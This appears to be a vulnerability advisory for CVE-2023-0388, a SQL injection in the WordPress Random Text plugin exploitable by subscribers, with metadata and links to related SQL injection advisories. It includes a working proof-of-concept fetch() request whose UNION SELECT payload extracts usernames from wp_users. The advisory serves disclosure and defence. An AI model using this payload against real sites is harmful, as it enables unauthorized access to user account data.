Random Text <= 0.3.0 – Subscriber+ SQLi | CVE 2023-0388 | Plugin Vulnerabilities

Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated users, such as subscribers.

Proof of Concept

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=parse-media-shortcode&shortcode=[randomtext category="\' UNION SELECT 1, user_login COLLATE utf8mb4_unicode_520_ci FROM wp_users #"]'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

77861a2e-879a-4bd0-b4c0-cd19481ace5d

Timeline

Publicly Published

2023-04-03 (about 2 years ago)

Added

2023-04-03 (about 2 years ago)

Last Updated

2023-04-03 (about 2 years ago)

Other

Published

Title

Published

2024-10-31

Title

WP EIS <= 1.3.3 - Authenticated (Contributor+) SQL Injection

Published

2014-08-01

Title

post highlights <= 2.2 - SQL Injection

Published

2025-01-07

Title

eDoc Easy Tables <= 1.29 - Authenticated (Contributor+) SQL Injection

Published

2015-04-15

Title

Ajax Store Locator <= 1.2 - Remote SQL Injection

Published

2025-02-03

Title

uListing < 2.1.7 - Unauthenticated SQL Injection